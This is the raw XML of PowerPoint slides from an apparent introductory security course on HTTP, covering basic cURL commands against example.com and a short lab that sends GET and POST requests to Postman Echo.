                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RESPONSE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BODY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Brace 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3D9FCFE-0985-4CBD-8651-A176E5D34B2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6512885" y="4957465"/>
            <a:ext cx="431821" cy="1139111"/>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2008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F928E86-365C-4CF4-B700-AFE986FFA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2459504"/>
            <a:ext cx="8686800" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3431897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8830-F2AD-544C-BDAB-FEF4596810E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9774B3B2-6EAF-E045-AFA6-5B3C1E21BADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1219200"/>
            <a:ext cx="8305800" cy="4431983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0"/>
              <a:t>Uses in Security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0"/>
              <a:t>  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Test that web server security configurations are functional</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - Ensure that web servers don't leak sensitive data through HTTP responses</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - Verify that servers only respond to certain request types</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - Search for vulnerabilities in the web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="833046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F928E86-365C-4CF4-B700-AFE986FFA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2667000"/>
            <a:ext cx="8686800" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2386188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785D-DC59-5749-B946-A98B5987AC3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="0"/>
            <a:ext cx="5470526" cy="653854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C95C95D-1E01-DC43-96CA-D17B2BD941F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="990600"/>
            <a:ext cx="7563854" cy="5324535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`curl -v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`curl -I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`curl --request GET --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`curl --help`</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4192387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028BFD-AFBF-4EF2-AA2A-EDCADA19AAE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Activity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this activity, you’ll use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to send different types of HTTP requests to Postman Echo. In particular, you will:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Send GET requests with query parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Send POST requests with request data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Study TCP connection logs produced by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To get started, run: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker run --it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cyberxsecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/alpine-curl</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mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This should drop you into a bash shell with the prompt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bash-4.4#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. From here , follow the instructions in the README.md provided via Slack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Good luck!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4081C5-5AC8-4193-97CA-7B6CB059A5B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (10 min.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3323676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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Welcome to the Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3605675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F928E86-365C-4CF4-B700-AFE986FFA534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2667000"/>
            <a:ext cx="8686800" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="462785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8077200" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-Side Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3872653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131323"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7EB1BDC-077A-4306-B2C5-9D6DE3FBB4B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="27701" r="26923"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="838200"/>
            <a:ext cx="1797996" cy="1981200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50291947-FFF1-4FF9-BDDC-BD814A24D2EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="23340" t="18311" r="21229" b="17505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2699792" y="896397"/>
            <a:ext cx="1643608" cy="1903124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F02100-0552-4C96-916D-48E51E53BC53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
